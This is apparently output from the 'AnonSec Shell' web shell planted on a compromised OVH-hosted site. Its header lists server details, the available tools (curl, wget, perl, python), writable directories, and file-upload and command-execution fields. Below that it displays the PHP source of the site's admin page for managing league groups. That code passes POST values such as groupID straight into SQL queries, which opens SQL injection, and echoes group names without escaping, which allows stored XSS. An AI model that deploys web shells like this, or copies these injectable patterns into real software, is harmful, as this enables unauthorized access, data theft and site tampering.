AnonSec Shell
Server IP : 149.202.105.228  /  Your IP : 216.73.216.18
Web Server : Apache
System : Linux webm129.cluster030.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : atfycaf ( 116275)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/atfycaf/www/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/atfycaf/www/admin//leagueTypes.php
<?php
include "globalVars.php";
if (in_array(13, $adminPriv) || in_array(14, $adminPriv) || in_array(15, $adminPriv)) {
} else {
	header("Location: $ADurl");
}

include "header.php";

if (isset($_POST["createGroup"])) {
	$newGroupName	= $_POST["groupName"];

	$pageURL	= str_replace($badURL, $goodURL, $newGroupName);
	$pageURL	= strtolower($pageURL) ;
	$dupQuery = mysqli_query($conn, "SELECT pageURL FROM leagueGroups WHERE pageURL LIKE '$pageURL%%'");
	$isDup		= mysqli_num_rows($dupQuery);
	if ($isDup > 0) {
		$pageURL	.= "-". ($isDup + 1);
	}
	mysqli_query($conn, "INSERT INTO leagueGroups (pageURL, groupTitle) VALUES ('$pageURL', '". addslashes($newGroupName) ."')");

	$trackDate		= date("Y-m-d H:i:s");
	mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminID', 'admin/leagueTypes.html', 'leagueGroups', 'The User ". addslashes($adminName) ." &lt;$adminEmail&gt; created the new league group ". addslashes($newGroupName) ."')");

	$htaccess	= createPDFht();
	$siteHT		= $SERVER_ROOT ."/pdf/.htaccess";
	$htFile		= fopen($siteHT, "w");
	fwrite($htFile, $htaccess);
	fclose($htFile);

	include "xmlSitemap.php";

} elseif (isset($_POST["updateGroup"])) {
	$groupID		= $_POST["groupID"];
	$newGroupName	= $_POST["groupName"];

	mysqli_query($conn, "UPDATE leagueGroups SET groupTitle = '". addslashes($newGroupName) ."' WHERE id = '$groupID'");

	$trackDate		= date("Y-m-d H:i:s");
	mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminID', 'admin/leagueTypes.html', 'leagueGroups', 'The User ". addslashes($adminName) ." &lt;$adminEmail&gt; updated the league group ID: $groupID (". addslashes($newGroupName) .")')");

} elseif (isset($_POST["deleteGroup"])) {
	$groupID		= $_POST["groupID"];

	mysqli_query($conn, "DELETE FROM leagueGroups WHERE id = '$groupID'");

	$trackDate		= date("Y-m-d H:i:s");
	mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminID', 'admin/leagueTypes.html', 'leagueGroups', 'The User ". addslashes($adminName) ." &lt;$adminEmail&gt; deleted the league group ID: $groupID')");

	$htaccess	= createPDFht();
	$siteHT		= $SERVER_ROOT ."/pdf/.htaccess";
	$htFile		= fopen($siteHT, "w");
	fwrite($htFile, $htaccess);
	fclose($htFile);

	include "xmlSitemap.php";

}
?>

				<h2>Update the League Groups</h2>

<?php
if (in_array(13, $adminPriv)) {
	?>
	<div class="descStTab" style="margin-bottom:40px;">
		<h3>Create a new League Group</h3>
		<form action="leagueTypes.html" method="post">
			<div class="pFormRow">
				<div class="pFormTitle">Group Name:</div>
				<div class="pFormInput">
					<input type="text" name="groupName" size="50" required />
					<div class="pFormLabel">
						<label class="labelName">Group Name:</label>
					</div>
				</div>
			</div>
			<input type="submit" class="submitButton" name="createGroup" value="Create this Group" />
		</form>
	</div>
	<?php
}
?>
	<div class="descTab" id="htmlSelectorTab">
		<h3>Existing Groups</h3>
	<?php
	$groupsQuery = mysqli_query($conn, "SELECT * FROM leagueGroups ORDER BY id ASC") or die (mysqli_error());
	while ($gQ = mysqli_fetch_array($groupsQuery)) {
		$groupID	= $gQ["id"];
		$groupName	= $gQ["groupTitle"];

		$hasTournamentsQuery = mysqli_query($conn, "SELECT id FROM leagueConfig WHERE leagueType = '$groupID'");
		$noChildren	= mysqli_num_rows($hasTournamentsQuery);
		if ($noChildren > 0) {
			$groupProtected	= true;
			if ($noChildren == 1) {
				$noChildren	= "1 League";
			} else {
				$noChildren	= "$noChildren Leagues";
			}
		} else {
			$groupProtected	= false;
		}
		?>
		<div class="pFormRow">
			<div class="pFormEditTitle">
				<?php echo $groupName ?>
				<div id="edit<?php echo $groupID ?>" class="hiddenInput">
					<form action="leagueTypes.html" method="post">
						<input type="hidden" name="groupID" value="<?php echo $groupID ?>">
						<div class="hFormRow">
							<div class="pFormTitle">New Group Name:</div>
							<div class="pFormInput">
								<input type="text" name="groupName" size="50" required />
								<div class="pFormLabel">
									<label class="labelName">N&ordm; of Participants:</label>
								</div>
							</div>
						</div>
						<input type="submit" class="submitButton" name="updateGroup" value="Save Changes" />
					</form>
				</div>
			</div>
			<div class="pFormEditButtons">
			<?php
			if (in_array(14, $adminPriv)) {
				?>
				<button type="button" class="submitButton editGroup" data-gid="<?php echo $groupID ?>">Edit Group Name</button>
				<form action="leagueTypesRules.html" method="post">
					<input type="hidden" name="groupID" value="<?php echo $groupID ?>">
					<button class="submitButton" name="getGroup">Edit Rules</button>
				</form>
				<?php
			}
			if (in_array(15, $adminPriv)) {
				?>
				<button type="button" class="deleteButton <?php if ($groupProtected == true) {?>deleteWarn<?php } else {?>deleteConfirm<?php } ?>" data-gid="<?php echo $groupID ?>" data-gn="<?php echo $groupName ?>" data-gc="<?php echo $noChildren ?>">Delete Group</button>
				<?php
			}
			?>
			</div>
		</div>
		<?php
	}
	?>
	</div>

<div id="deleteWarningPop" class="deletePop">
	<div class="deletePopBG">
		<div class="deletePopContainer">
			<h4 class="deleteWarning">Warning</h4>
			<p>The League group <span id="groupName"></span> has <span id="tCount"></span> selected as part of this group. If you delete the group the leagues will no longer be visible on the website.</p>
			<p>Are you sure you want to delete it?</p>
			<form action="leagueTypes.html" method="post">
				<input type="hidden" name="groupID" id="gidInput" value="">
				<div class="pForm50">
					<button type="button" class="submitButton cancelDeleteW">No</button>
				</div>
				<div class="pForm50">
					<button class="deleteButton" name="deleteGroup">Yes, Delete it</button>
				</div>
			</form>
		</div>
	</div>
</div>
<div id="deleteConfirmPop" class="deletePop">
	<div class="deletePopBG">
		<div class="deletePopContainer">
			<h4>Confirm Delete</h4>
			<p>Are you sure you want to delete the League Group <span id="groupNameC"></span>?</p>
			<form action="leagueTypes.html" method="post">
				<input type="hidden" name="groupID"id="gidInputC" value="">
				<div class="pForm50">
					<button type="button" class="submitButton cancelDeleteC">No</button>
				</div>
				<div class="pForm50">
					<button class="deleteButton" name="deleteGroup">Yes, Delete it</button>
				</div>
			</form>
		</div>
	</div>
</div>

<?php
include "footer.php";
?>

Anon7 - 2022
AnonSec Team